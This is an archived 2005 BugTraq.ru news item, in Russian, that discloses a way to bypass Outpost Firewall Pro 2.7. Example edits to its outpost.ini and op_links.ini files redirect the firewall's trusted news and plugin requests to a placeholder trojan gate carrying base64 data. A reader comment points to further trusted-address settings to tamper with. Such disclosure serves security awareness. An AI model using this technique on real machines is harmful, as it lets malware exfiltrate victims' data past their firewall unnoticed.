информационная безопасность
без паники и всерьез
 подробно о проекте 		Rambler's Top100Все любят медСетевые кракеры и правда о деле ЛевинаЗа кого нас держат?
BugTraq.Ru
 Русский BugTraq
 Знакомьтесь: проект Namecoin, будущий... 
 Основы защиты данных от разрушения.... 
 Секреты DPAPI 
 Adobe все-таки выпустит бесплатные... 
 CGI-уязвимость в PHP: второй подход... 
 Adobe пропатчила Shockwave, Flash,... 
главная книги soft обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / RSN / архив / 2005 / сентябрь
2005
главная
январь
февраль
март
апрель
май
июнь
июль
август
сентябрь
октябрь
ноябрь
декабрь
предложить новость

Add to Google



Paragon Partition Manager 7.0

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: http://bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH      
предложить новость  |  обсудить  |  все отзывы (1) [7921]
назад «  » вперед

последние новости
Adobe все-таки выпустит бесплатные обновления для CS5.x // 14.05.12 11:13
CGI-уязвимость в PHP: второй подход к снаряду // 09.05.12 17:54
Adobe пропатчила Shockwave, Flash, Photoshop, Illustrator // 09.05.12 00:00
Майские обновления от MS // 08.05.12 21:21
Присяжные признали Google частично виновной в нарушении копирайта на Java API // 08.05.12 14:14
Февральское обновление Lion раскрыло пользовательские пароли // 06.05.12 20:51
Опасная и все еще неисправленная восьмилетняя уязвимость в PHP // 04.05.12 17:27

Комментарии:

Ты лучше повнимательней приглядись к файлу... 14.09.05 08:17  
Автор: shaelf Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Ты лучше повнимательней приглядись к файлу "конфигурация1.ini", вот там есть где погулять:) (деверенные адреса, доверенные порты и т.д.)
<добавить комментарий>
анонимность клоуны конференции спам уязвимости .net acrobat activex adobe android apple beta blaster borland botnet chrome cisco ctf ddos dmca dnet dns dos eclipse eeye elcomsoft excel facebook firefox flash freebsd gnome google gpl ibm icq ie ios iphone java l0pht leak linux livejournal mac mcafee microsoft mozilla netware nginx novell open source opera oracle os/2 outlook patch php powerpoint quicktime rc5 redhat retro rip rsa safari sco secunia server service pack shopping skype solaris sony spyware stuff sun symantec torrents unix virus vista vmware vpn wikipedia windows word xp xss yahoo


Rambler's Top100
Рейтинг@Mail.ru

Content.Mail.Ru

  Copyright © 2001-2012 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach